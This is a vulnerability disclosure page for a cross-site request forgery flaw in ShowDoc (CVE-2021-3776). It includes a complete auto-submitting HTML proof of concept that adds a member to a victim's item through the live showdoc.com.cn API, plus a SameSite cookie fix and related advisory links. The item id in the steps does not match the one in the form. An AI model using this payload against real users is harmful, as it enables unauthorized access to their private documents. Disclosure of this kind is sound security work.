Lucene search
AmammadE0EDF27D-437E-44FE-907A-DF020F385304HistorySep 06, 2021 - 10:18 a.m.
Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-09-0610:18:48
amammad
www.huntr.dev
6
0.001 Low
EPSS
Percentile
31.2%
✍️ Description
With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker website.
We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to null and we can bypass CSRF protection.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address test that already should registered before have access to item with id 1531601670203340.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203344" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of reveal any item.
Fix
Set SameSite attribute of cookies to Lax or Strict.
Related
veracode
veracode
Cross-site Request Forgery (CSRF)
2021-11-15 04:27:18
osv
osv
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:13:34
CVE-2021-3776
2021-11-13 10:15:07
cve
cve
CVE-2021-3776
2021-11-13 10:15:07
cnvd
cnvd
ShowDoc Cross-Site Request Forgery Vulnerability
2021-11-16 00:00:00
nvd
nvd
CVE-2021-3776
2021-11-13 10:15:07
prion
prion
Cross site request forgery (csrf)
2021-11-13 10:15:00
cvelist
cvelist
CVE-2021-3776 Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-11-13 09:20:10
github
github
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:13:34